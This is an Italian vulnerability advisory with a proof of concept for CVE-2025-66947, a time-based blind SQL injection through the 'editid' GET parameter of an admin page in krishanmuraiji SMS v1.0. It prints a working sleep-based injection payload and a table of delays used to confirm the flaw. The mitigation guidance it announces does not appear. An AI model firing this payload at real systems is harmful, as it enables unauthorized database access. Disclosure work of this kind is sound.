
Proof-of-concept per l'iniezione SQL cieca basata sul tempo in un pannello di amministrazione PHP. Dimostra lo sfruttamento tramite un parametro GET non sanificato, con indicazioni di mitigazione per un uso difensivo.
⏱️ Confronto visivo: risposta normale vs risposta ritardata di ~6s
TL;DR: Un parametro GET in un modulo amministrativo consente l'iniezione SQL basata sul tempo tramite ritardi nella risposta.
In krishanmuraiji SMS v1.0 esiste una vulnerabilità di iniezione SQL cieca basata sul tempo dovuta alla validazione impropria di un parametro GET in un modulo amministrativo.
/studentms/admin/edit-class-detail.phpeditid (GET)/studentms/admin/edit-class-detail.php?editid=12
/studentms/admin/edit-class-detail.php?editid=12*if(now()=sysdate(),sleep(6),0)
| Payload | Ritardo |
|---|---|
sleep(3) | ~3s |
sleep(6) | ~6s |
sleep(15) | ~15s |
Ritardo costante = Iniezione SQL confermata
Questo pattern di vulnerabilità si presenta comunemente in:
Anche quando è richiesta l'autenticazione e gli errori sono nascosti,
l'iniezione SQL basata sul tempo rimane sfruttabile e pericolosa.
Gravità: Alta
CVE-2025-66947
Ranjan KumarQuesto PoC è fornito solo a scopo educativo e difensivo.
CVE-2025-66947, SQL Injection, Time-Based Blind SQL Injection, PHP, Admin Panel